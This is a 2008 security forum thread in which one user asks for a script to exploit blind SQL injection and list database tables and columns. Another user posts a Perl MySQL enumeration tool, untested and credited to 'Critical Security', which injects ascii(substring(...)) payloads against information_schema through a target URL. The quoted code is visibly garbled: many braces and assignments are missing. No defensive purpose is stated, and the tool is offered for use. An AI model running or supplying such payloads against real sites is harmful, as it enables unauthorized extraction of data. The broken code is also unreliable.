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( Script ) SQL injection Blind ? |
Posted: Tue Apr 08, 2008 11:59 am |
w0rm |
Active user |

Joined: Feb 22, 2008 |
Posts: 49 |
Hi some one can help me , i need a script perl or php to exploite a Vulnerbility SQL injection Blind , and Show all Tables Name and Columns Name ?? , thanks for any help ... |
Posted: Wed Apr 09, 2008 12:52 pm |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
Posted: Tue Jul 15, 2008 7:42 pm |
faka |
Regular user |

Joined: Nov 20, 2007 |
Posts: 7 |
Quote: | #!/usr/bin/perl
# Critical Security, 2006 (http://www.critical.lt)
use LWP::UserAgent;
use Getopt::Std;
use Switch;
print "\n+----------------------------------------------+\n";
print "| Critical Security mysql5 db enumeration tool |\n";
print "+----------------------------------------------+\n\n";
getopts('u:vr:ed:t:', \%opts);
if($url&&$regexp&&$version) {checkversion();}
elsif($url&&$regexp&&$enum) {enumdb();}
elsif($url&&$regexp&&$db&&$tb) {enumcolumns();}
elsif($url&&$regexp&&$db) {enumtables();}
else {
print "Usage: $0 -u url -r regexp [-v] [-e] -d [dbname] -t [table]\n\n";
print "-u url -blind sql injection url\n";
print "-r regexp -perl regular expression\n";
print "-v -get mysql version\n";
print "-e -get dbs list\n";
print "-d db name -get tables list\n";
print "-t table name -get columns list\n\n";
sub checkversion()
if ($char=="0") {print "Mysql version:\n\n$ver\n\n[DONE]\n";exit();}
else {
sub enumdb()
print "Databases:\n\n";
if ($char=="0") {
if (!$ver){last}
else{print "$ver\n";$ver="";$num=0;$limit++;}
else {
print "\n[DONE]\n";
sub enumtables()
print "$db tables:\n\n";
$db =~ s/([\x21-\x7e]{1})/ord($1).","/ge;
if ($char=="0") {
if (!$ver){last}
else{print "$ver\n";$ver="";$num=0;$limit++;}
else {
print "\n[DONE]\n";
sub enumcolumns()
print "$db.$tb columns:\n\n";
$db =~ s/([\x21-\x7e]{1})/ord($1).","/ge;
$tb =~ s/([\x21-\x7e]{1})/ord($1).","/ge;
if ($char=="0") {
if (!$ver){last}
else{print "$ver\n";$ver="";$num=0;$limit++;}
else {
print "\n[DONE]\n";
sub found()
if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax);return $char;}
$r = int($fmax - ($fmax-$fmin)/2);
$check = ">$r";
if ( &check($check) ) {&found($r,$fmax);} else {&found($fmin,$r+1);}
sub crack()
$i = $cmin;
while ($i<$cmax)
$crcheck = "=$i";
if ( &check($crcheck) ) {return $i;}
sub check()
if($func eq "version"){$query = $url." and ascii(substring(version(),".$num.",1))".$exp;}
elsif($func eq "database"){$query = $url." and ascii(substring((select schema_name from information_schema.schemata limit ".$limit.",1),".$num.",1))".$exp;}
elsif($func eq "table"){$query = $url." and ascii(substring((select table_name from information_schema.tables where table_schema=char($db) limit ".$limit.",1),".$num.",1))".$exp;}
elsif($func eq "column"){$query = $url." and ascii(substring((select column_name from information_schema.columns where table_schema=char($db) and table_name=char($tb) limit ".$limit.",1),".$num.",1))".$exp;}
else {exit();}
$conn = LWP::UserAgent->new() or die;
$res = $conn->get($query);
@data = $res->content;
foreach $result(@data)
if ($result =~ /$regexp/) { return 1; }
return 0;
I did not test it and dont know or working! |
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